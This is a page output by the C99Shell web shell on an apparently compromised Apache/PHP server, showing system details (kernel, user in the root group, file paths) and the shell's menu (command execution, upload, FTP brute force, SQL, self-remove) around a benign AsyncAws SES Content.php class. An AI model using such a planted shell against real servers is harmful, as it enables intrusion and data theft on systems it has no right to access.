!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/vendor/async-aws/ses/src/ValueObject/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Content.php (1.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace AsyncAws\Ses\ValueObject;

use 
AsyncAws\Core\Exception\InvalidArgument;

/**
 * The subject line of the email. The subject line can only contain 7-bit ASCII characters. However, you can specify
 * non-ASCII characters in the subject line by using encoded-word syntax, as described in RFC 2047.
 *
 * @see https://tools.ietf.org/html/rfc2047
 */
final class Content
{
    
/**
     * The content of the message itself.
     */
    
private $data;

    
/**
     * The character set for the content. Because of the constraints of the SMTP protocol, Amazon SES uses 7-bit ASCII by
     * default. If the text includes characters outside of the ASCII range, you have to specify a character set. For
     * example, you could specify `UTF-8`, `ISO-8859-1`, or `Shift_JIS`.
     */
    
private $charset;

    
/**
     * @param array{
     *   Data: string,
     *   Charset?: null|string,
     * } $input
     */
    
public function __construct(array $input)
    {
        
$this->data $input['Data'] ?? null;
        
$this->charset $input['Charset'] ?? null;
    }

    public static function 
create($input): self
    
{
        return 
$input instanceof self $input : new self($input);
    }

    public function 
getCharset(): ?string
    
{
        return 
$this->charset;
    }

    public function 
getData(): string
    
{
        return 
$this->data;
    }

    
/**
     * @internal
     */
    
public function requestBody(): array
    {
        
$payload = [];
        if (
null === $v $this->data) {
            throw new 
InvalidArgument(sprintf('Missing parameter "Data" for "%s". The value cannot be null.'__CLASS__));
        }
        
$payload['Data'] = $v;
        if (
null !== $v $this->charset) {
            
$payload['Charset'] = $v;
        }

        return 
$payload;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0097 ]--